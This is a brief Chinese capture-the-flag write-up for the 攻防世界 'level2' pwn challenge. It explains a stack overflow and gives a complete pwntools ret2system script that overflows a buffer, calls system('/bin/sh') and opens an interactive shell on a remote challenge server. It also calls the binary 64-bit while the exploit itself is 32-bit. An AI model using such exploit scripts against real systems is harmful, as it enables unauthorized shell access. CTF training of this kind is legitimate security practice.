level2攻防世界pwn

checksec后试运行


放入64位ida



典型栈溢出

发现system,但参数不对,那我们shift+F12查看字符串,发现binsh,地址为0x0804A024


system在plt的地址为0x08048320

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',31028)

system_plt = 0x08048320
binsh = 0x0804A024

payload = ''
payload += 'A'*0x88
payload += p32(0)
payload += p32(system_plt)
payload += p32(0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()
成功

你可能感兴趣的:(level2攻防世界pwn)